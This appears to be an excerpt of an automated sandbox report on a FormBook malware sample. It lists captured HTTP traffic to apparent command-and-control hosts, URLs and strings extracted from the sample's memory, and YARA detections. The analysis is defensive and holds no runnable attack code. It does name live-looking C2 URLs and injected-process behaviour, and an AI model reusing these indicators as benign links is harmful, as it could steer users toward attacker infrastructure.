20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 14:34:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8a8cde953aa50f42-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, must-revalidate, max-age=0Content-Encoding: gzipExpires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodingki-cache-type: NoneKi-CF-Cache-Status: BYPASSki-edge: v=20.2.8;mv=3.0.9ki-origin: g1pX-Content-Type-Options: nosniffX-Edge-Location-Klb: 1Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JGfPbDcNpTgU%2BJAJNRp9AKajRAavhgeiMCx274CqiBm8zcIVEYTVULikm9B2pGPgr6WC5CXTC%2Be2B6mKTNIuq2ThXemTJO7Comflrkov1Mg2Ie0BuMHIbE8QWNmUALr3pMEKdCEPrg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflarealt-svc: h3=":443"; ma=86400Data Raw: 33 35 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd e9 9a db 38 92 28 fa db fe be fb 0e 34 cb 95 92 3a 49 a6 a4 5c 6c 4b 96 7d 5c 2e 57 b7 67 bc d4 f5 d2 7d 7a 9c fe 74 28 91 52 d2 a6 44 35 49 65 3a 5b d6 7d 8d fb 40 f7 c5 6e 2c 00 08 6e 5a 32 5d 3d 33 df 39 b5 a4 48 20 10 08 04 02 81 88 00 08 3c be e7 45 e3 f4 7a e1 1b 17 e9 2c 7c 72 f7 31 fe 18 a1 3b 9f 0e 4c 7f 6e 7f 7c 6f 62 9a ef 7a 4f ee de 79 3c f3 53 d7 18 5f b8 71 e2 a7 03 f3 e3 87 df ec 87 a6 4a 9f bb 33 7f 60 5e 06 fe d5 22 8a 53 d3 18 47 f3 d4 9f 03 dc 55 e0 a5 17 03 cf bf 0c c6 be 4d 2f 96 11 cc 83 34 70 43 3b 19 bb a1 3f e8 10 96 30 98 7f 35 62 3f 1c 98 8b 38 9a 04 a1 6f 1a 17 b1 3f 19 98 17 69 ba 48 7a 47 47 d3 d9 62 ea 44 f1 f4 e8 db 64 7e d4 e1 42 69 90 86 fe 93 df dd a9 6f cc a3 d4 98 44 cb b9 67 1c fc f4 b0 db e9 f4 8d 3f 47 91 67 bc f1 83 e9 c5 28 8a 8d e7 e1 72 f4 f8 Data Ascii: 35568(4:I\lK}\.Wg}zt(RD5Ie:[}@n,nZ2]=39H <Ez,|r1;Ln|obzOy<S_qJ3`^"SGUM/4pC;?05b?8o?iHzGGbDd~BioDg?Gg(r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 14:34:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8a8cdea56c341996-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, must-revalidate, max-age=0Content-Encoding: gzipExpires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodingki-cache-type: NoneKi-CF-Cache-Status: BYPASSki-edge: v=20.2.8;mv=3.0.9ki-origin: g1pX-Content-Type-Options: nosniffX-Edge-Location-Klb: 1Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bug7ducbxjEKR7hyDY6Y571Sy2q5t0kx5h05aqDV1s87rWENSFiqrT4P7MNW4miCrMO8YkPdvODR88BKaqKbDOFNTuSd6PcOQi1qgL0sBaZ%2FSsdGYLlUVlRYHyVsM%2BaMKbVMScpxhw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflarealt-svc: h3=":443"; ma=86400Data Raw: 33 35 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd e9 9a db 38 92 28 fa db fe be fb 0e 34 cb 95 92 3a 49 a6 a4 5c 6c 4b 96 7d 5c 2e 57 b7 67 bc d4 f5 d2 7d 7a 9c fe 74 28 91 52 d2 a6 44 35 49 65 3a 5b d6 7d 8d fb 40 f7 c5 6e 2c 00 08 6e 5a 32 5d 3d 33 df 39 b5 a4 48 20 10 08 04 02 81 88 00 08 3c be e7 45 e3 f4 7a e1 1b 17 e9 2c 7c 72 f7 31 fe 18 a1 3b 9f 0e 4c 7f 6e 7f 7c 6f 62 9a ef 7a 4f ee de 79 3c f3 53 d7 18 5f b8 71 e2 a7 03 f3 e3 87 df ec 87 a6 4a 9f bb 33 7f 60 5e 06 fe d5 22 8a 53 d3 18 47 f3 d4 9f 03 dc 55 e0 a5 17 03 cf bf 0c c6 be 4d 2f 96 11 cc 83 34 70 43 3b 19 bb a1 3f e8 10 96 30 98 7f 35 62 3f 1c 98 8b 38 9a 04 a1 6f 1a 17 b1 3f 19 98 17 69 ba 48 7a 47 47 d3 d9 62 ea 44 f1 f4 e8 db 64 7e d4 e1 42 69 90 86 fe 93 df dd a9 6f cc a3 d4 98 44 cb b9 67 1c fc f4 b0 db e9 f4 8d 3f 47 91 67 bc f1 83 e9 c5 28 8a 8d e7 e1 72 f4 f8 Data Ascii: 35568(4:I\lK}\.Wg}zt(RD5Ie:[}@n,nZ2]=39H <Ez,|r1;Ln|obzOy<S_qJ3`^"SGUM/4pC;?05b?8o?iHzGGbDd~BioDg?Gg(r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 14:34:24 GMTServer: ApacheContent-Length: 551Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f 6f 70 73 3c 2f 68 31 3e 20 20 0a 20 20 3c 70 3e 54 68 65 20 50 61 67 65 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 6e 27 74 20 68 65 72 65 2e 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2e 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div><!-- partial --> <script src="./script.js"></script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 14:34:27 GMTServer: ApacheContent-Length: 551Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f 6f 70 73 3c 2f 68 31 3e 20 20 0a 20 20 3c 70 3e 54 68 65 20 50 61 67 65 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 6e 27 74 20 68 65 72 65 2e 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2e 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div><!-- partial --> <script src="./script.js"></script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 14:34:27 GMTServer: ApacheContent-Length: 551Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f 6f 70 73 3c 2f 68 31 3e 20 20 0a 20 20 3c 70 3e 54 68 65 20 50 61 67 65 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 6e 27 74 20 68 65 72 65 2e 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2e 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div><!-- partial --> <script src="./script.js"></script></body></html>
            Source: JeouiaPf03mHSBH.exe, snTlRrBza.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: JeouiaPf03mHSBH.exe, snTlRrBza.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: SearchIndexer.exe, 00000011.00000002.2927079100.0000000003F5A000.00000004.10000000.00040000.00000000.sdmp, qRurKwDVhn.exe, 00000014.00000002.2926538072.000000000337A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://goodneighbor.club/rk1u/?Srs=F12hDm1e4DcVWImHJ
            Source: JeouiaPf03mHSBH.exe, snTlRrBza.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1771673685.000000000357C000.00000004.00000800.00020000.00000000.sdmp, snTlRrBza.exe, 00000007.00000002.2007365104.000000000328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: qRurKwDVhn.exe, 00000014.00000002.2925569784.000000000261B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lomos.top
            Source: qRurKwDVhn.exe, 00000014.00000002.2925569784.000000000261B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lomos.top/pnxn/
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1777536550.0000000007932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: SearchIndexer.exe, 00000011.00000002.2924136902.0000000002AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: SearchIndexer.exe, 00000011.00000002.2924136902.0000000002AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: SearchIndexer.exe, 00000011.00000002.2924136902.0000000002AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: SearchIndexer.exe, 00000011.00000002.2924136902.0000000002AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: SearchIndexer.exe, 00000011.00000002.2924136902.0000000002AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: SearchIndexer.exe, 00000011.00000003.2460891100.0000000007B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: JeouiaPf03mHSBH.exe, snTlRrBza.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: SearchIndexer.exe, 00000011.00000003.2507278751.0000000007B6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.2925725443.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2925650588.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2095784893.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2925371648.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2097970125.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.2448787756.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2923647911.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2925569784.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2098515296.00000000023F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2345762971.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.2925655670.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.2925725443.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.2925650588.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2095784893.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000012.00000002.2925371648.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2097970125.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.2448787756.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.2923647911.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000014.00000002.2925569784.0000000002580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2098515296.00000000023F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.2345762971.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.2925655670.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            .NET source code contains very large array initializations
            Source: 0.2.JeouiaPf03mHSBH.exe.63e0000.3.raw.unpack, bg.csLarge array initialization: : array initializer size 15924
            Source: 0.2.JeouiaPf03mHSBH.exe.34631c0.0.raw.unpack, bg.csLarge array initialization: : array initializer size 15924
